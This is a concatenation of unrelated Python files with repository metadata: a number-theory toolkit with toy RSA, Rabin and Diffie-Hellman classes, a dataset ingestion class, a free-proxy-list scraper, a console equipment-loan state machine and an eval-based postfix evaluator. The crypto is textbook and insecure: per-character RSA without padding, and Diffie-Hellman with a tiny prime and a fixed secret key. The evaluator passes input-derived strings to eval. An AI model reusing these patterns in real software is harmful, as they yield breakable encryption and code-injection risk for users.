__init__(self,num_in,num_out,pieces):\n# super(Maxout,self).__init__()\n# self.W = nn.Parameter(torch.randn(num_in,num_out,pieces))\n# self.b = nn.Parameter(torch.randn(num_out,pieces))\n# def forward(self,X):\n# return torch.from_numpy(np.max(np.tensordot(X.detach().numpy(),self.W.detach().numpy(),axes=1) + self.b.detach().numpy(),axis=2))\n\n\n\n\n# =====================================================================================\n\n\n\ndef add_time(func):\n # 这个wraps是固定写法,为了函数文档和函数名字的不变\n @wraps(func)\n def wrap_func(*args,**kwds):\n s = time.time()\n # 这是我的函数的主体部分,我希望在前后加上一些东西\n ans = func(*args,**kwds)\n e = time.time()\n print(f'Time for {func.__name__} is {e - s}s')\n return ans\n return wrap_func\n\n\ndef __lcm(a:int,b:int) -> int:\n return a*b//gcd(a,b)\n\ndef lcm(*a):\n '''lcm(3,4,5,6,7)'''\n assert len(a) > 1,f'The number of input of function lcm must be bigger than 1'\n ans = __lcm(a[0],a[1])\n for item in a[2:]:\n ans = __lcm(ans,item)\n return ans\n pass\n\n\n\ndef __gcd(a,b):\n a = abs(a)\n b = abs(b)\n if a == 0:\n return b\n if b == 0:\n return a\n\n while a!=0 and b!=0:\n a,b = b,a%b\n\n if b == 0:\n return a\n if a == 0:\n return b\n \n\n\ndef gcd(*a):\n '''\n 求多个整数的最大公因数\n gcd(12,32,45,64)\n '''\n # for item in a:\n # if item == 1:\n # return 1\n # if len(a) == 2:\n # return __gcd(a[0],a[1])\n # else:\n # d = __gcd(a[0],a[1])\n # for i in range(2,len(a)):\n # d = __gcd(d,a[i])\n # if d == 1:\n # return d\n # return d\n l = len(a)\n assert l>1,f'The length of list should be bigger than 1'\n gcd = 1\n for i in range(l-1):\n x = abs(a[i])\n y = abs(a[i+1])\n while x!=0 and y!=0:\n x,y = y,x%y\n if x == 0:\n gcd = y\n else:\n gcd = x\n if gcd == 1:\n return gcd\n return gcd\n\n\ndef is_prime (n):\n n = int(n)\n if n == 1:\n return False\n\n if n > 1e6:\n return is_large_prime(int(n))\n upper = int(n ** 0.5)\n upper += 1\n for i in range(2,upper):\n if n % i == 0 :\n return False\n return True\n\n\ndef get_prime (N):\n '''获取前小于等于N的所有素数'''\n a = [True] * (N + 1)\n indices = list(range(2,N + 1))\n for index in indices:\n if not a[index]:\n pass \n else :\n i = 2\n while index * i <= N :\n a[i * index] = False \n i += 1\n ans = list(filter(lambda x:a[x],indices))\n return ans\n\n\ndef bezout(a,b):\n '''计算贝祖等式'''\n s2 = 0\n s1 = 1\n t2 = 1\n t1 = 0\n q = int(a / b)\n r2 = a % b\n r1 = b\n\n while r2 != 0:\n s2,s1 = -q * s2 + s1 , s2\n t2,t1 = -q * t2 + t1 , t2\n q = int(r1 / r2)\n r2,r1 = -q * r2 + r1 , r2\n return (s2,t2)\n\n\n\n\n# @add_time\ndef get_inverse(a,m):\n '''求解a模m的逆元'''\n tmp = bezout(a,m)[0]\n while tmp <= 0:\n tmp += m\n return tmp\n\n\ndef china_res(b:list,m:list):\n '''\n the first element of returned tuple is the ANS\\n\n the second element of returned tuple is the product of M_i\\n\n '''\n M = 1\n for item in m:\n M *= item\n \n ans = 0\n \n for i in range(len(m)):\n m_i = m[i]\n M_i = int(M / m_i)\n M_i_inverse = get_inverse(M_i,m_i)\n ans += int(b[i] * M_i * M_i_inverse)\n \n # ans %= M\n ans = ans % M\n # print(ans)\n # print(M)\n return (ans,M)\n\ndef ten2two(n:int,total_bits:int=8):\n '''n should be positive'''\n sign = (n >= 0)\n n = abs(n)\n tmps = []\n while n != 0:\n tmps.append(int(n&1))\n n >>= 1\n tmps.append(0)\n if not sign:\n for i in range(len(tmps)):\n tmps[i] = 1 if tmps[i] == 0 else 0\n tmps[0] += 1\n for i in range(len(tmps)):\n if tmps[i] == 2:\n tmps[i] = 0\n if i < len(tmps) - 1:\n tmps[i + 1] += 1\n else:\n tmps.append(1)\n tmps = tmps[::-1]\n tmps = ''.join(str(item) for item in tmps)\n tmps = tmps[0] + tmps[0]*(total_bits - len(tmps)) + tmps[1:] if total_bits >= len(tmps) else tmps[len(tmps) - total_bits:]\n return tmps\n\n\ndef euler_function(n:int):\n '''求n的欧拉函数phi(n)'''\n N = n\n primes = get_prime(n)\n p_set = []\n for p in primes:\n while n % p == 0:\n n /= p\n p_set.append(p)\n p_set = set(p_set)\n ans = N\n for p in p_set:\n ans *= (1 - 1/p)\n return int(ans)\n\n\ndef solve_foce(a:int,b:int,m:int):\n '''\n solve_first_order_congruence_equation\n return value is a tuple\n the first element of tuple is constant\n the second element of tuple is the coefficient of t\n '''\n gcd_a_m = gcd(a,m)\n a1 = get_inverse(int(a/gcd_a_m), int(m/gcd_a_m))\n a2 = b / gcd_a_m * a1\n a2 = int(a2)\n return (a2,int(m/gcd_a_m))\n\n\n\n# @add_time\ndef fast_power(base:int,power:int,m:int) -> int:\n '''\n return base^power mod m\n '''\n ans = 1\n while power != 0:\n if power & 1:\n ans = ans * base % m\n base = base * base % m\n power >>= 1\n return ans \n\ndef get_all_factors(n:int):\n '''获取n所有的因数'''\n s = set()\n for i in range(1,int(math.sqrt(n) + 1)+1):\n if n % i == 0:\n s.add(i)\n s.add(n // i)\n return s\n\n\ndef factor(n:int):\n '''\n factor(n)\n 对n进行素因数分解\n 算数基本定理进行分解\n '''\n l = []\n target = int(math.sqrt(n)) + 1\n for i in range(2,target+1):\n while n % i == 0:\n n = n // i\n l.append(i)\n if n != 1:\n l.append(n)\n return dict(Counter(l))\n\ndef euler_judge(a:int,p:int):\n '''判断a是不是模p的平方剩余'''\n ans = fast_power(a,(p-1)//2,p)\n return ans if ans==1 else ans - p\n\ndef legendre(a:int,p:int):\n '''计算勒让德符号(a/p)'''\n if a % p == 0:\n return 0\n return euler_judge(a,p)\n\ndef theorem_4_3_4(a,p):\n if a == 2:\n return (-1) ** ((p**2-1)/8)\n elif gcd(a,2*p) == 1:\n tmp = 0\n for k in range(1,(p-1)//2 + 1):\n tmp += int(a*k/p)\n return (-1) ** tmp\n else:\n print(f'gcd(a,2p) != 1')\n\n\ndef m2m(m,e,b):\n '''\n return m^e % b\n '''\n result=1\n m1=m\n while(e>=1):\n e1=e%2\n if(e1==1):\n result=(m1*result)%b\n m1=(m1**2)%b\n e=e//2\n return int(result)\n\n# class RSA():\n# @staticmethod\n# def hello_static():\n# print(f'This is {RSA.__name__} static method!')\n\n# @classmethod\n# def hello_class(cls):\n# print(f'This is {RSA.__name__} class method!')\n\n# def __init__(self,p=19260817,q=19260817):\n# self.p = p\n# self.q = q\n# self.n = p * q\n# self.phi = (self.p -1) * (self.q -1)\n# self.e = random.randint(2,self.phi)\n# while gcd(self.e,self.phi) != 1:\n# self.e = random.randint(2,self.phi)\n# self.d = get_inverse(self.e,self.phi)\n# self.char_to_index = {}\n# self.index_to_char = {}\n# self.set_char()\n \n# def __func(self,num):\n# if num < 10:\n# return '0' + str(num)\n# else :\n# return str(num)\n \n# def set_char(self,char_set = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' + 'abcdefghijklmnopqrstuvwxyz' + ' ,.?!' + '0123456789'):\n \n \n# self.char_set = char_set\n# indices = [self.__func(i) for i in range(len(self.char_set))]\n# self.char_to_index = {k:v for k,v in zip(self.char_set,indices)}\n# self.index_to_char = {k:v for v,k in self.char_to_index.items()}\n\n\n# def digitalize(self,m):\n# if not isinstance(m,str):\n# m = str(m)\n# ans = []\n# for item in m:\n# ans.append(self.char_to_index.get(item))\n# return ''.join(ans)\n \n# def dedigitalize(self,c):\n# if not isinstance(c,str):\n# c = str(c)\n# ans = []\n# for i in range(0,len(c),2):\n# ans.append(self.index_to_char.get(c[i] + c[i+1]))\n# return ''.join(ans)\n \n# def lock(self,m):\n# if not isinstance(m,int):\n# m = int(m)\n# c = m2m(m,self.e,self.n)\n# return c\n\n# def unlock(self,c):\n# if not isinstance(c,int):\n# c = int(c)\n# m = m2m(c,self.d,self.n)\n# return m\n \ndef two2ten(n:str)->int:\n n = list(n)[::-1]\n ans = 0\n for index in range(len(n)):\n ans += int(n[index]) * 2**index\n return ans\n\n\ndef func(n:str):\n k,n = n.split('.')\n base = 10 ** (len(n))\n n = int(n)\n count = 0\n ans = []\n for i in range(40):\n n *= 2\n ans.append(int(n // base))\n count += 1\n if count == 4:\n ans.append(' ')\n count = 0\n n = n % base\n if n == 0:\n break\n weishu = ''.join(str(item) for item in ans)\n\n return k + '.' + weishu\n\ndef jianfa(a:str,b:str):\n '''二进制减法 a需要比b大'''\n A = [0] * len(a)\n B = [0] * len(b)\n for i in range(len(a)):\n A[i] = int(a[i])\n for i in range(len(b)):\n B[i] = int(b[i])\n a = A\n b = B\n a = a[::-1]\n b = b[::-1]\n for index in range(len(b)):\n a[index] -= b[index]\n for index in range(len(a)):\n while a[index] < 0:\n a[index] += 2\n a[index + 1] -= 1\n a = a[::-1]\n return ''.join(str(item) for item in a)\n\ndef get_quadratic_residue(m:int):\n '''获取模m的二次剩余'''\n ans = set()\n for x in range(m):\n a = x**2 % m\n if gcd(a, m) == 1:\n ans.add(a)\n return ans\n\ndef theorem_4_6_3(a:int,p:int):\n '''课本149页的定理4.6.3'''\n assert p%2==1 and is_prime(p),f'p={p} is not an odd prime number!'\n \n t = int(factor(p-1).get(2,0))\n s = (p-1) // 2**t\n a_inverse = get_inverse(a,p)\n\n while True:\n n = random.randint(1,p)\n if gcd(n,p) == 1 and legendre(n,p) != 1:\n break\n b = fast_power(n,s,p)\n ans = [0] * t\n ans[-1] = fast_power(a,(s+1)//2,p)\n for index in range(t-2,-1,-1):\n flag = fast_power((a_inverse * ans[index + 1]**2),2**(index),p)\n if flag % p == 1:\n j = 0\n else:\n j = 1\n ans[index] = (ans[index + 1] * b**(j * 2**(t - index - 2))) % p\n return ans[0]\n\ndef theorem_4_6_2(a:int,p:int,q:int):\n '''solve this : x^2 mod p*q = a'''\n assert is_prime(p) and (p+1) % 4 == 0,f'You cannot use theorem_4_6_2 because p={p} is not prime like 4k+3'\n assert is_prime(q) and (q+1) % 4 == 0,f'You cannot use theorem_4_6_2 because q={q} is not prime like 4k+3'\n assert legendre(a,p)==1, f'You cannot use theorem_4_6_2 because p={p} does not satisfiy legendre'\n assert legendre(a,q)==1, f'You cannot use theorem_4_6_2 because q={q} does not satisfiy legendre'\n\n s,t = bezout(q,p)\n s,t = s*q,t*p\n s1 = fast_power(a,(p+1)//4,p)\n t1 = fast_power(a,(q+1)//4,q)\n ans = [0] * 4\n ans[0] = s1*s + t1*t\n ans[1] = -s1*s + t1*t\n ans[2] = s1*s - t1*t\n ans[3] = -s1*s - t1*t\n for index in range(len(ans)):\n ans[index] %= (p*q)\n return tuple(ans)\n\n\n# @click.command()\n# @click.option('--a',type=int)\n# @click.option('--m',type=int)\ndef enumerate_quadratic(a,m):\n '''暴力求解x^2 mod m == a'''\n ans = []\n for x in range(m):\n if x**2 % m == a:\n ans.append(x)\n print(ans)\n return tuple(ans)\n\nclass Rabin():\n def __init__(self,p=19260803,q=19260767):\n self.p = p\n self.q = q\n self.n = self.p * self.q \n self.charset = ' ,.?!' + '0123456789' + 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' + 'abcdefghijklmnopqrstuvwxyz'\n self.char_to_index = {\n char:index + 12345678 for index,char in enumerate(self.charset)\n }\n self.index_to_char = {\n index:char for char,index in self.char_to_index.items()\n }\n self.group_len = 16\n def lock(self,m):\n cypertext = ''\n m = str(m)\n for char in m:\n index = self.char_to_index[char]\n c = str(fast_power(index,2,self.n))\n c = '0'*(self.group_len - len(c)) + c\n cypertext += c\n return cypertext\n\n def unlock(self,c):\n c = str(c)\n m = ''\n for index in range(0,len(c),self.group_len):\n c_single = int(c[index:index+self.group_len])\n c_num = theorem_4_6_2(c_single,self.p,self.q)\n for num in c_num:\n if num < 1e9:\n m += self.index_to_char[num]\n break\n\n return m\n\n\ndef theorem_4_7_1(p:int):\n '''\n 课本P159定理4.7.1\n 求解x^2 + y^2 = p\n p = 2 or p = 4k + 1\n '''\n assert p==2 or p%4==1 ,'p != 2 or p is not like 4k + 1'\n x = theorem_4_6_3(-1,p)\n y = 1\n m = (x**2 + y**2)//p\n while m != 1:\n u = x % m \n v = y % m\n x,y = (u*x + v*y)//m , (u*y - v*x)//m\n m = (x**2 + y**2) //p\n return x,y\n\ndef get_exp(a,m):\n '''获得a模m的指数e'''\n assert gcd(a,m) == 1,f'gcd({a},{m})不是1,不满足指数的条件!'\n i = 1\n while fast_power(a,i,m) != 1:\n i += 1\n return i\n\ndef is_primitive_root(a:int,m:int):\n '''判断a是不是模m原根'''\n assert gcd(a,m) == 1,f'a = {a} , m = {m} 并不互素,不满足原根或指数的判断条件!'\n flag = True\n phi = euler_function(m)\n e = get_exp(a,m)\n return e == phi\n pass\n\n\ndef get_prime_factors(n):\n '''获取n所有的素因子'''\n l = list(factor(n).keys())\n return l\n\n\ndef get_primitive_root(n):\n '''求n的原根'''\n # assert is_prime(n) and n != 2,f'{n} is not odd prime number!'\n if is_prime(n) and n != 2:\n l = get_prime_factors(n-1)\n l = list(map(lambda x:(n-1)//x,l))\n ans = []\n for g in range(2,n):\n if gcd(g,n) != 1:\n continue\n flag =True\n for index in l:\n if fast_power(g,index,n) == 1:\n flag = False\n break\n if flag:\n ans.append(g)\n return ans\n else:\n print(f'm = {n} is not odd prime number, so using enumerate to get all primitive roots of m = {n}')\n ans = []\n for i in range(1,n):\n try:\n if is_primitive_root(i,n):\n ans.append(i)\n except AssertionError:\n pass\n return ans\n pass\n \n\n\nclass RSA():\n def __init__(self):\n super().__init__()\n self.p = get_large_prime()\n self.q = get_large_prime()\n self.n = self.p * self.q\n self.len = len(str(self.n))\n self.phi = (self.p-1) * (self.q-1)\n # self.bias = 132435343242330\n # self.charset = '0123456789' + 'abcdefghijklmnopqrstuvwxyz' + 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' + ',.?><[]*%_@{#} \\\\!/:\\n()+-=\\'\"'\n # self.index_to_char = {\n # index + self.bias :char for index,char in enumerate(self.charset)\n # }\n # self.char_to_index = {\n # char : index for index,char in self.index_to_char.items()\n # }\n \n self.e = random.randint(2,self.phi)\n while gcd(self.e,self.phi) != 1:\n self.e = random.randint(2,self.phi)\n self.d = get_inverse(self.e,self.phi)\n\n def lock(self,m):\n m = str(m)\n tmp = []\n for char in m:\n # tmp.append(self.char_to_index[char])\n tmp.append(ord(char))\n c = []\n for char in tmp:\n char = int(char)\n c_tmp = str(fast_power(char,self.e,self.n))\n c_tmp = '0'*(self.len - len(c_tmp)) + c_tmp \n c.append(c_tmp)\n return ''.join(c)\n \n def unlock(self,c,use_china_res=False):\n if not use_china_res:\n c = str(c)\n m = []\n for i in range(0,len(c),self.len):\n c_char = int(c[i:i+self.len])\n c_char = fast_power(c_char,self.d,self.n)\n # c_char = self.index_to_char[c_char]\n c_char = chr(c_char)\n m.append(str(c_char))\n return ''.join(m)\n else:\n # count = 0\n c = str(c)\n m = []\n for i in range(0,len(c),self.len):\n print(f'Decoding No.{i} char...')\n c_char = int(c[i:i+self.len])\n # c_char = fast_power(c_char,self.d,self.n)\n b1 = fast_power(c_char,self.d,self.p)\n b2 = fast_power(c_char,self.d,self.q)\n c_char = china_res([b1,b2],[self.p,self.q])[0]\n # c_char = self.index_to_char[c_char]\n c_char = chr(c_char)\n m.append(str(c_char))\n return ''.join(m)\n \n\nclass DH():\n def __init__(self):\n super().__init__()\n self.p = 353\n gs = get_primitive_root(self.p)\n index = random.randint(0,len(gs))\n self.g = gs[index]\n self.sk = 233\n self.pk = fast_power(self.g,self.sk,self.p)\n def change(self,pk_2):\n self.sk = fast_power(pk_2,self.sk,self.p)\n\n\ndef is_large_prime(n:int,k:int=4):\n '''\n Use Miller-Rabin method to judge whether number n is a large prime number.\\n\n k in the safe coefficient and when k = 4(default), the accuracy is bigger than 99.99%.\\n\n '''\n if n == 1 or (n & 1) == 0:\n return False\n if n == 2:\n return True\n t = n - 1\n s = 0\n while (t & 1) == 0:\n # t = t >> 1\n t >>= 1\n s += 1\n\n for _ in range(k):\n b = random.randint(2,n)\n while gcd(b,n) != 1:\n b = random.randint(2,n)\n # r = 0\n index = fast_power(b,t,n)\n\n # r = 0\n if index == 1 or index == (n-1):\n continue\n \n flag = False\n for r in range(1,s):\n index = (index**2) % n\n if index == 1:\n return False\n if index == (n-1):\n flag = True\n if flag:\n break\n if flag:\n continue\n else:\n return False\n return True\n\ndef get_large_prime(low:int=2**100,high:int=2**200,k:int=4):\n '''\n Use Miller-Rabin method to find a large prime number.\\n\n Please make sure the difference between low and high is sufficiently big.\\n\n k in the safe coefficient and when k = 4(default), the accuracy is bigger than 99.99%.\\n\n '''\n while True:\n n = random.randint(low,high)\n if is_large_prime(n,k):\n return n\n\n\ndef lian_fen_shu(x,K:int=10):\n '''\n 构造简单的连分数\\n\n x是需要计算的数字\\n\n K是迭代次数 默认是10\\n\n 返回一个元组:第1个元素是近似值,第2个元素是连分数,是一个list\\n\n '''\n tmps = []\n a = math.floor(x)\n x = x - a\n k = 0\n tmps.append(a)\n while x != 0 and k < K:\n a = math.floor(1 / x)\n x = 1/x - a\n tmps.append(a)\n k += 1\n tmps = tmps[::-1]\n ans = tmps[0]\n for index in range(1,len(tmps)):\n ans = 1/ans + tmps[index]\n # print(tmps[::-1])\n return ans,tmps[::-1]\n\n\n\nclass Fenshu():\n def __init__(self,num=1,den=1):\n '''num是分子默认为1\\nden是分母默认为1\\n'''\n super().__init__()\n self.num = int(num)\n self.den = int(den)\n \n def add(self,y):\n num = self.num * y.den + self.den * y.num\n den = self.den * y.den\n tmp = gcd(num,den)\n num //= tmp\n den //= tmp\n return Fenshu(num,den)\n \n def sub(self,y):\n num = self.num * y.den - self.den * y.num\n den = self.den * y.den\n tmp = gcd(num,den)\n num //= tmp\n den //= tmp\n return Fenshu(num,den)\n \n def mul(self,y):\n num = self.num * y.num\n den = self.den * y.den\n tmp = gcd(num,den)\n num //= tmp\n den //= tmp\n return Fenshu(num,den)\n \n def inv(self):\n return Fenshu(self.den,self.num)\n \n def div(self,y):\n return self.mul(y.inv())\n\n def display(self):\n return self.num,self.den\n \n def xiaoshu(self):\n return self.num / self.den\n\n def to_lianfenshu(self):\n '''转换成连分数的形式\\n如果这个分数是负数,会被转换成正数来进行操作\\n'''\n ans = []\n num = abs(self.num)\n den = abs(self.den)\n zhengshu = num // den\n xiaoshu = Fenshu(num - zhengshu * den,den)\n ans.append(zhengshu)\n while xiaoshu.num != 0:\n xiaoshu = xiaoshu.inv()\n zhengshu = xiaoshu.num // xiaoshu.den\n xiaoshu = Fenshu(xiaoshu.num - zhengshu * xiaoshu.den, xiaoshu.den)\n ans.append(zhengshu)\n return ans\n\n\n\ndef lianfenshu_to_float(X:list):\n '''从一个list的连分数转换成分子/分母\\n'''\n X = [Fenshu(x) for x in X]\n ans = X[-1]\n X = X[0:-1][::-1]\n for x in X:\n ans = ans.inv().add(x)\n return ans.display(),ans.xiaoshu()\n\n\n\nif __name__ == '__main__':\n # n = 2**257 - 1\n # n = 19260817\n # for p in [89,107]:\n # n = 2**p - 1\n # print(f'p = {p} , n = {n} , {is_large_prime(n)}')\n # print(gcd(12,10,6,4,6454))\n\n\n # d = DH()\n # d.change(40)\n # a = 61\n # print(get_primitive_root(a))\n # print(is_large_prime(2**67 - 1))\n # n = 2**257 - 1\n # s = 1\n # t = (n-1) // (2**s)\n # print(fast_power(3,t,n))\n\n\n # print(lian_fen_shu(math.pi,10) )\n # with open('ans.json','w',encoding='utf8') as f:\n # ts = [(20210520,113),(210520,191)]\n # ANS = {}\n # for index,t in enumerate(ts):\n # ans = {}\n # a,b = t\n # ans['a'] = a\n # ans['b'] = b\n # ans['连分数'] = lian_fen_shu(a/b,100)[1]\n # # print(lian_fen_shu(a/b,100))\n # # print(bezout(a,b))\n # ans['a的系数'],ans['b的系数'] = bezout(a,b)\n # ANS[index] = ans\n # json.dump(ANS,f,ensure_ascii=False)\n\n # r = RSA()\n # text = ''\n # with open('out.txt','r',encoding='utf8') as f:\n # text = f.read()\n # c = r.lock(text)\n # print(c)\n # with open('cipher_text.txt','w+') as f:\n # f.write(c)\n # print()\n # print(r.unlock(c,False))\n\n\n # all = 0\n # true = 0\n # for n in range(100000):\n # if is_large_prime(n):\n # all += 1\n # if is_prime(n):\n # true += 1\n # print(true / all)\n\n # a = get_large_prime()\n # print(a,get_prime_factors(a))\n pi = [3,7,15,1,293,10,3,8,2,1,3,11,1,2,1,2,1]\n ans = lianfenshu_to_float(pi)\n num = ans[0][0]\n den = ans[0][1]\n print(ans)\n print(pi)\n print(Fenshu(num,den).to_lianfenshu())\n print(Fenshu(22,7).xiaoshu())\n\n\n # a = Fenshu(1,3)\n # b = Fenshu(2,5)\n # c = a.div(b)\n # print(c.display())\n\n \n\n # ms = [5,6,7]\n # m = 1\n # for _ in ms:\n # m *= _\n # Ms = list(map(lambda x:m//x,ms))\n # for Mi,mi in zip(Ms,ms):\n # print(f'{m}/{mi}={Mi}模{mi}逆元是{get_inverse(Mi,mi)}')\n\n\n pass\n\n # for n in [191,191**2,113,113*9]:\n # for b in [2,3,5,7]:\n # print(f'n = {n} , b = {b} , mod = {fast_power(b,n-1,n)}')\n\n# a = [3,1,1,2,3,1,1]\n# a = a[::-1]\n# ans = a[0]\n# for i in range(1,len(a)):\n# ans = 1/ans + a[i]\n# print(ans - 7700/2145)\n\n\n# a = 1\n# for i in range(10000):\n# a = 1/a + 1\n# print(a - (5**0.5+1)/2)","repo_name":"zerzerzerz/xinanshuji","sub_path":"tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":26851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"24042276584","text":"from FarmInsectsClassifier.entity.config_entity import DataIngestionConfig\nfrom FarmInsectsClassifier.logger import logging\nfrom FarmInsectsClassifier.exception import DataIngestionError\n\nfrom pathlib import Path\nfrom zipfile import ZipFile\nimport splitfolders\n\nclass DataIngestion:\n def __init__(self, data_path: Path, config: DataIngestionConfig):\n self.data_path = data_path\n self.config = config\n\n def unzip(self) -> None:\n \n unzip_path = self.config.unzip_dir\n unzip_path.mkdir(exist_ok=True, parents=True)\n\n logging.info(\"Extracting zip file\")\n\n with ZipFile(self.data_path, \"r\") as zip_ref:\n zip_ref.extractall(unzip_path)\n\n logging.info(\"Zipfile extraction completed\")\n\n \n\n\n def split_data(self) -> None:\n \n path = list(self.config.unzip_dir.resolve().iterdir())[0]\n output = self.config.unzip_dir / \"farm-insects-splitted\"\n\n logging.info(\"Splitting folder into train, test and validation set\")\n\n splitfolders.ratio(path, seed=1, output=str(output), ratio=(0.6, 0.2, 0.2))\n\n logging.info(\"Train, test and validation data successfully created\")\n\n \n","repo_name":"yickysan/Farm-Insects-Classification","sub_path":"src/FarmInsectsClassifier/components/data_ingestion.py","file_name":"data_ingestion.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"40864339359","text":"from collections import namedtuple, defaultdict\nimport requests\nimport itertools\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\nimport shelve\nimport warnings\nfrom concurrent.futures import ThreadPoolExecutor\n\n\nfrom .config import CACHE_PATH\nfrom .exceptions import PageServerDown\n\n\nclass Proxy:\n\n\t__slots__ = ('ip', 'port', 'type', 'anonymous', 'speed', 'time_since_last_check')\n\n\tdef __init__(self, ip, port, type, anonymous, speed, time_since_last_check):\n\t\tself.ip = ip\n\t\tself.port = port\n\t\tself.type = type\n\t\tself.anonymous = anonymous\n\t\tself.speed = speed\n\t\tself.time_since_last_check = time_since_last_check\n\n\tdef to_string(self):\n\t\treturn '{}:{}'.format(self.ip, self.port)\n\n\t__repr__ = __str__ = to_string\n\n\tdef __eq__(self, other):\n\t\treturn self.to_string() == other.to_string()\n\n\tdef __hash__(self):\n\t\treturn hash(self.to_string())\n\n\ndef parse_page(url):\n\t\"\"\" Parse a single html page on https://www.xicidaili.com to get a list of proxies \"\"\"\n\tnow = datetime.today()\n\n\theaders = headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\n\tpage = requests.get(url, headers=headers)\n\tif page.status_code != 200:\n\t\twarnings.warn('{} could not be connected at the moment'.format(url))\n\t\t# raise PageServerDown('{} could not connect'.format(url))\n\tsoup = BeautifulSoup(page.text, 'lxml')\n\n\tproxies = list()\n\tfor row in soup.find_all('tr'):\n\t\tcols = row.find_all('td')\n\t\tif len(cols) == 10:\n\t\t\tspeed = cols[6].find(class_='bar_inner').attrs['style'] # width:99%\n\t\t\tspeed = float(''.join(filter(lambda x: x.isdigit(), speed)))\n\n\t\t\tlast_check_time = datetime.strptime(cols[-1].text.strip(), '%y-%m-%d %H:%M')\n\t\t\ttime_since_last_check = (now - last_check_time).seconds\n\n\t\t\tp = Proxy(ip=cols[1].text, \n\t\t\t\t\tport=cols[2].text, \n\t\t\t\t\ttype=cols[5].text, \n\t\t\t\t\tanonymous=(cols[4].text=='高匿'), \n\t\t\t\t\tspeed=speed,\n\t\t\t\t\ttime_since_last_check=time_since_last_check)\n\t\t\tproxies.append(p)\n\treturn proxies\n\n\ndef get_proxies(use_cache=False, save=True):\n\t# TODO: http://www.kuaidaili.com/free/inha/\n\n\tif use_cache:\n\t\t# set flag to 'r' to support concurrent reads\n\t\twith shelve.open(CACHE_PATH, flag='r') as f:\n\t\t\tproxies = {k: v for k, v in f.items()}\n\t\t\treturn proxies\n\n\tXICI = 'https://www.xicidaili.com/{}/{}'\n\n\tproxies = defaultdict(list)\n\t# get the first 10 pages\n\t# for url in [XICI.format(*i) for i in itertools.product(['wn', 'wt'], range(1, 11))]:\n\t# \tfor proxy in parse_page(url):\n\t# \t\tproxies[proxy.type].append(proxy)\n\n\twith ThreadPoolExecutor(max_workers=20) as ex:\n\t\tresults = ex.map(parse_page, \n\t\t\t[XICI.format(*i) for i in itertools.product(['wn', 'wt'], range(1, 11))])\n\n\tfor result in results:\n\t\tfor proxy in result:\n\t\t\tproxies[proxy.type].append(proxy)\n\n\tif save:\n\t\t# TODO: adding thread locks here\n\t\twith shelve.open(CACHE_PATH, writeback=True) as f:\n\t\t\tfor k, v in proxies.items():\n\t\t\t\tf[k] = v\n\t\tprint('Saved to {}'.format(CACHE_PATH))\n\treturn proxies\n\n\n","repo_name":"MaxwellLZH/random-proxy","sub_path":"randomproxy/collect.py","file_name":"collect.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"42605224065","text":"#!/usr/bin/env python\nfrom db.EquipmentRecord import EquipmentRecord\nfrom db.AccountRecord import AccountRecord\nimport state as state\nimport dev.display.Console as Console\nfrom state.commonResource import CommonResource as cmn_res\nfrom db.UserProcedure import UserProcedure\nfrom dev.input import input\n\nclass ConfirmToUpdateProcedure(state.IState):\n def entry(self):\n self.__input = input.SunitizedString(\n input.ConsoleTextField()\n )\n self.__get_next_state = state.ErrorHasOccurred()\n\n Console.clear()\n Console.puts(\"以下の内容で手続きを行います。よろしいですか?(Y/N)\")\n Console.puts(\"ユーザID :\", cmn_res.user.data[AccountRecord.EMPLOYEE_ID])\n Console.puts(\"機材ID :\", cmn_res.equipment.data[EquipmentRecord.EQUIPMENT_ID])\n Console.puts(\"機材名 :\", cmn_res.equipment.data[EquipmentRecord.EQUIPMENT_NAME])\n Console.puts(\"返却予定日:\", cmn_res.equipment.data[EquipmentRecord.END_DATE])\n Console.puts(\">\", end=\"\")\n self.__get_next_state = state.ErrorHasOccurred()\n\n def do(self):\n self.__input.capture()\n\n def exit(self):\n if( self.__input.get_string() in [\"y\",\"Y\"]):\n result = UserProcedure(True).update_equipment_return_date(\n cmn_res.user.data[AccountRecord.EMPLOYEE_ID],\n cmn_res.equipment.data[EquipmentRecord.EQUIPMENT_ID],\n cmn_res.equipment.data[EquipmentRecord.END_DATE])\n if result == True:\n self.__get_next_state = state.SuccessUpdateEquipment()\n else:\n Console.puts(\"更新の受理に失敗しました。\")\n Console.puts(\"再度試しても失敗する場合、システム管理者に問い合わせてください。\", \"\\n\")\n self.__get_next_state = state.ErrorHasOccurred()\n else:\n Console.puts(\"更新手続きをキャンセルしました。\")\n self.__get_next_state = state.GotoNextAfterWaiting()\n self.__get_next_state.set_next_state(state.StandbyUpdateEquipmentIdInput())\n\n def get_next_state(self):\n return self.__get_next_state\n\n def should_exit(self):\n return self.__input.submitted()\n","repo_name":"soudai-aisw/aisw_bihin","sub_path":"src/state/ConfirmToUpdateProcedure.py","file_name":"ConfirmToUpdateProcedure.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"}
+{"seq_id":"29996906137","text":"\ndef post_fix(expr):\n pieces = expr.split()\n nums = [p for p in pieces if p.isnumeric()]\n ops = [p for p in pieces if not p.isnumeric()]\n \n curr = nums[0]\n \n for num,op in zip(nums[1:],ops):\n curr = str(int(eval(curr+op+num)))\n \n return int(curr)\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"kZSi2XWDpu83miexy_1.py","file_name":"kZSi2XWDpu83miexy_1.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
